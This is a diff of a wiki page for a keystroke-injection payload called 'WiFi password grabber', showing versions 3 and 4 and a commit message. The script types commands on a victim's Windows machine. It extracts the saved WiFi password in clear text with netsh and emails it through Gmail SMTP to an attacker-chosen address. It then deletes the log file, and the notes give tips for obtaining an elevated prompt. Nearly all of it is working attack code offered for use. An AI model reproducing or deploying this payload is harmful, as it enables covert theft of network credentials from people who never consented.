Payload---WiFi-password-grabber.md, before:

### Change the following things;
* **ACCOUNT**: Your **gmail account**
* **PASSWORD**: Your **gmail password**
* **RECEIVER**: The email you want to send the content of Log.txt to

## **Code**;
```
REM Title: WiFi password grabber
REM Author: Siem
REM Version: 3
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.
DELAY 3000

REM --> Minimize all windows
WINDOWS d

REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 1000

REM --> Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER

REM --> Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER

REM --> Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER

REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER

REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER

REM --> Delete A.txt
STRING del A.txt
ENTER

REM --> Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER

REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING exit
ENTER

REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER
```

### Change log;
1. Original
2. Bug fixes and narrowed commands
3. Send contents of Log.txt instead the file itself

### Suggestions;
**If you have any suggestions, write them down here.**

- For me i needed to add a DELAY 50 betwin the powershell exit and the cmd exit.. (But i'm on an Arduino Mini with a special compiler)
- If the wifi ssid has a space like "TPLINK HOME" then A would be set to "TPLINK" and get error "Profile "TPLINK" is not found on the system"

The cmd prompt must be elevated to get any passwords.  If you change from using the WINDOWS r to using the search menu for "cmd" and pressing ctrl+shift+enter you can get a UAC prompt.  From there you'd need to alt+Y to get the elevated prompt.

You can also use the run box but with the following command in Win7 and later:
powershell Start-Process cmd -Verb runAs

Commit message:

Added support for SSID's with spaces by removing the space as delimeter and setting the variable after that to use quotation marks and removing the first character (which will be the space)

Payload---WiFi-password-grabber.md, after:

### Change the following things;
* **ACCOUNT**: Your **gmail account**
* **PASSWORD**: Your **gmail password**
* **RECEIVER**: The email you want to send the content of Log.txt to

## **Code**;
```
REM Title: WiFi password grabber
REM Author: Siem
REM Version: 4
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.
DELAY 3000
REM --> Minimize all windows
WINDOWS d
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 200
REM --> Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=:" %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER
STRING set A="%A:~1%"
ENTER
REM --> Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER
REM --> Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER
REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER
REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER
REM --> Delete A.txt
STRING del A.txt
ENTER
REM --> Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER
REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER
```

### Change log;
1. Original
2. Bug fixes and narrowed commands
3. Send contents of Log.txt instead the file itself
4. Removed the space as delimiter
5. Added the STRING set A="%A:~1%" to be able to use SSID's with spaces as well

### Suggestions;
**If you have any suggestions, write them down here.**

- For me i needed to add a DELAY 50 betwin the powershell exit and the cmd exit.. (But i'm on an Arduino Mini with a special compiler)
- If the wifi ssid has a space like "TPLINK HOME" then A would be set to "TPLINK" and get error "Profile "TPLINK" is not found on the system" -- FIXED
- Added the delay after sending the SMTP message, to make sure the EXIT and DEL log.txt are executed (I had issues with this)

The cmd prompt must be elevated to get any passwords.  If you change from using the WINDOWS r to using the search menu for "cmd" and pressing ctrl+shift+enter you can get a UAC prompt.  From there you'd need to alt+Y to get the elevated prompt.

You can also use the run box but with the following command in Win7 and later:
powershell Start-Process cmd -Verb runAs
